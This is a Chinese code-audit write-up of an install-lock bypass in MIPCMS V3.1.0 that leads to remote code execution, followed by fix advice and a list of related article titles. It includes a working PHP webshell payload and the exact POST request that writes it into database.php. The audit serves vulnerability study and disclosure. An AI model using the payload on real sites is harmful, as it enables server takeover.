0x00 环境准备

MIPCMS官网:https://www.mipcms.cn

网站源码版本:MIPCMS内容管理系统 V3.1.0(发布时间:2018-01-01)

程序源码下载:http://www.mipcms.cn/mipcms-3.1.0.zip

本地测试网站:

0x01 代码分析

1、漏洞文件位置/app/install/controller/Install.php  第13-23行:

 {
​if (is_file(PUBLIC_PATH . 'install' . DS .'install.lock')) {  header('Location: ' . url('@/'));  exit();  }  if (!defined('__ROOT__')) {  $_root = rtrim(dirname(rtrim($_SERVER['SCRIPT_NAME'], '/')), '/');  define('__ROOT__', (('/' == $_root || '\\' == $_root) ? '' : $_root));  }

这段index函数对install.lock文件进行检测,如果发现存在就退出。我们继续看下面的代码,本次远程代码执行漏洞代码主要为installPost函数,先来看一下第118-142行:

 public function installPost(Request $request) {  header('Access-Control-Allow-Origin: *');  header('Access-Control-Allow-Credentials: true');  header('Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS');  header('Access-Control-Allow-Headers: Content-Type, Content-Range,access-token, secret-key,access-key,uid,sid,terminal,X-File-Name,Content-Disposition, Content-Description');  if (Request::instance()->isPost()) {  $dbconfig['type']="mysql";  $dbconfig['hostname']=input('post.dbhost');  $dbconfig['username']=input('post.dbuser');  $dbconfig['password']=input('post.dbpw');  $dbconfig['hostport']=input('post.dbport');  $dbname=strtolower(input('post.dbname'));           $username = input('post.username');  $password = input('post.password');  $rpassword = input('post.rpassword');  if (!$username) {  return jsonError('请输入用户名');  }  if (!$password) {  return jsonError('请输入密码');  }  if (!$rpassword) {  return jsonError('请输入重复密码');  }

这段函数中,并没有沿用index中install.lock进行检测,我们可以通过构造链接,直接跳转到这一步,绕过index函数中install.lock的检测。可以看到,这段installPost函数中获取了多个参数,继续往下看:

     $dsn = "mysql:dbname={$dbname};host={$dbconfig['hostname']};port={$dbconfig['hostport']};charset=utf8";  try {  $db = new \PDO($dsn, $dbconfig['username'], $dbconfig['password']);  } catch (\PDOException $e) {  return jsonError('错误代码:'.$e->getMessage());  }  $dbconfig['database'] = $dbname;  $dbconfig['prefix']=trim(input('dbprefix'));  $tablepre = input("dbprefix");  $sql = file_get_contents(PUBLIC_PATH.'package'.DS.'mipcms_v_3_1_0.sql');  $sql = str_replace("\r", "\n", $sql);  $sql = explode(";\n", $sql);  $default_tablepre = "mip_";  $sql = str_replace(" `{$default_tablepre}", " `{$tablepre}", $sql);  foreach ($sql as $item) {  $item = trim($item);  if(empty($item)) continue;  preg_match('/CREATE TABLE `([^ ]*)`/', $item, $matches);  if($matches) {  if(false !== $db->exec($item)){
​} else {  return jsonError('安装失败');  }  } else {  $db->exec($item);  }  }

这段函数对获取的参数进行检测,Mysql数据库连接失败会报错退出,接着进行导入数据库操作。

继续往下看,第172-192行:

         if(is_array($dbconfig)){  $conf = file_get_contents(PUBLIC_PATH.'package'.DS.'database.php');  foreach ($dbconfig as $key => $value) {  $conf = str_replace("#{$key}#", $value, $conf);  }  $install = CONF_PATH;  if(!is_writable($install)){  return jsonError('路径:'.$install.'没有写入权限');  }  try {  $fileStatus = is_file(CONF_PATH. '/database.php');  if ($fileStatus) {  unlink(CONF_PATH. '/database.php');  }  file_put_contents(CONF_PATH. '/database.php', $conf);  return jsonSuccess('配置文件写入成功',1);  } catch (Exception $e) {  return jsonError('database.php文件写入失败,请检查system/config 文件夹是否可写入');  }

在installPost函数的最后,将参数写入到配置文件database.php中,而且并未对参数进行任何过滤或转义,攻击者可以构造脚本代码写入配置文件。

综上,首先程序流程把控不严谨,可以绕过install.lock检测进入installPost函数中,然后通过构造参数将脚本代码写入配置文件,进一步去触发脚本代码,控制网站服务器。程序在实现上存在远程代码执行漏洞,危害极大。

0x02 漏洞利用

一、如何去构造Payload

难题1:构造的参数在Mysql连接中,必须连接成功,不然程序就报错退出了。

在写入配置文件中,我们能够控制的参数有5个参数,到底哪个参数能利用呢?写入配置文件的形式如下:

     return [  'hostname'       => '127.0.0.1',    // 服务器地址  'database'       => 'test',         // 数据库名  'username'       => 'root',         // 用户名  'password'       => 'root',         // 密码  'hostport'       => '3306',         // 端口  ];

为了能让Mysql连接成功,我们需要自己搭建一个Mysql服务,让程序连接不会报错,这样才能继续利用。另外,在5个参数中,服务器地址和端口是不能改的,用户名限制不能超过16位,Mysql的密码是加密也不好利用,唯一剩下可以利用的就是数据库名,要建立一个与Payload名字一样的数据库名,才能连接成功。

难题2:写入配置文件的时候,大写会全部转化为小写,那么全局变量$_GET等,全局不能利用:

为此,测试了不少一句话木马,尝试通过加密来解决问题,如:

     test',1=>file_put_contents("test.php",strtoupper('<?php eval($_POST[g])?>')),'xx'=>'  test',1=>eval(base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2ddKT8+)),'xx'=>'   test',1=>eval(urldecode(%24%5F%50%4F%53%54%5B%67%5D)),'xx'=>'

但是这些Payload要么不行执行,要么不能命名为数据库名。最终,灵感突现,直接放弃​_POST,利用php://input实现的webshell,就不必纠结于大小写了。

     最终Payload:  test',1=>eval(file_get_contents('php://input')),'xx'=>'

二、漏洞利用过程

模拟环境:网站服务器IP:192.168.8.131 模拟攻击者服务器IP:192.168.8.1

过程1:首先在攻击者服务器(192.168.8.1)搭建一个Mysql服务,新建数据库命名为:test',1=>eval(file_get_contents('php://input')),'xx'=>'

过程2:访问网站服务器(192.168.8.131)提交Payload写入配置文件,

Payload:

http://192.168.8.131/index.php?s=/install/Install/installPost

POST:username=admin&password=admin&rpassword=admin&dbport=3306&dbname=test',1=>eval(file_get_contents('php://input')),'xx'=>'&dbhost=192.168.8.1&dbuser=root&dbpw=root

进一步去触发脚本代码,执行系统命令,whoami查看网站服务器当前用户为administrator: 

查看网站服务器IP设置:

0x03 修复建议

​ 1、在初始化过程中进行lock文件检测,避免被绕过;

​ 2、全局配置可考虑写入数据库进行调用。

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【代码审计】MIPCMS 远程写入配置文件Getshell相关推荐

  1. MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)

    作者:i春秋作家--F0rmat 0×01 前言 今天翻了下CNVD,看到了一个MIPCMS的远程代码执行漏洞,然后就去官网下载了这个版本的源码研究了下.看下整体的结构,用的是thinkPHP的架构, ...

  2. 网络安全-实战篇 ZZZPHP1.61 代码审计-从SQL注入到Getshell

    近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少. 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏 ...

  3. php代码审计文件包含,PHP代码审计之远程文件包含(RFI)

    有位叫做普瑞斯特的大牛针对PHP的web应用列出了下面几种攻击方式: 1.命令注入(Command Injection)2.eval注入(Eval Injection)3.客户端脚本攻击(Script ...

  4. python读取配置文件存在某配置_Python读取配置文件(config.ini)以及写入配置文件

    一.读取配置文件 我的目录如下,在config下有一个config.ini配置文件 配置文件内容# 定义config分组 [config] platformName=Android appPackag ...

  5. ConfigParser-- 读取写入配置文件

    基础读取配置文件 -read(filename)               直接读取文件内容 -sections()                      得到所有的section,并以列表的形 ...

  6. zookeeper管理mysql_Mysql系列九:使用zookeeper管理远程Mycat配置文件、Mycat监控、Mycat数据迁移(扩容)...

    一.使用zookeeper管理远程Mycat配置文件 环境准备: 虚拟机192.168.152.130: zookeeper,具体参考前面文章 虚拟机192.168.152.128: 安装好Mycat ...

  7. Inno Setup选择语言并写入配置文件、翻译提示信息

    制作一个支持多种语言的安装包,应当具备以下几种能力: 读取系统语言设置,并作为启动时的默认语言 可选择安装的语言,随后显示对应语言的的安装提示语 将选择的语言写入到配置文件,以供程序运行时进行判断 对 ...

  8. prometheus remote write for springboot 远程写入<一>

    prometheus启动参数 --enable-feature=remote-write-receiver 准备 remote.proto types.proto gogo.proto protoc- ...

  9. siteservercms 缺点_Siteserver CMS 远程模板下载Getshell漏洞

    SiteServerCMS-Remote-download-Getshell-vulnerability SiteServerCMS 远程模板下载Getshell漏洞 avatar 漏洞缺陷是由于后台 ...

最新文章

  1. numpy.matmul处理一维数组的 3维以上的性质
  2. linux 火狐安装java插件_Linux下Firefox安装配置JDK插件
  3. 自定义标签 (转载)
  4. php编译安装与配置
  5. 设置一个双色球脚本(2)并带颜色输出
  6. swift5的代理的使用
  7. 数据安全架构设计与实战~如何加密结构化数据
  8. SharePoint 2013 版本功能对比
  9. C#基础回顾(一)—C#访问修饰符
  10. Python项目部署到Docker的完整过程
  11. Python:1004 成绩排名
  12. 怎么锁定计算机的ip地址,电脑静态ip地址怎么设置
  13. Windows中命令行收集
  14. w10电脑c盘满了怎么清理_w10电脑自动更新安装完c盘满了怎么清理
  15. 定时器输出的PWM频率范围及占空比精度
  16. 第二章---近红外光谱分析的光谱组成1
  17. Racket编程指南——20 并行
  18. 预约上门洗车小程序开发方案上门洗车系统定制开发汽车上门服务系统软件开发
  19. 安卓开发入门--第一个手机APP
  20. C语言 printf函数输出 以及 sizeOf函数的使用注意

热门文章

  1. 这么找企业联系方式?教你一招全部搞定
  2. 查看每个cpu核使用情况
  3. cursor:hand 与 cursor:pointer的区别介绍
  4. OMS订单管理系统怎么样?
  5. WPF 中DataGrid控件显示和设置数据
  6. 怎么卸载光速头条_我用这三招,整理了桌面并且屏蔽了广告弹窗
  7. AutoCAD 2020 简体中文版 珊瑚版
  8. 【已解决】d3drm.dll放在哪里?d3drm.dll文件下载地址在哪?
  9. 个人理财第六课-基金投资之货币基金和债券基金
  10. 转—正弦波逆变器入门到精通----逆变器设计原理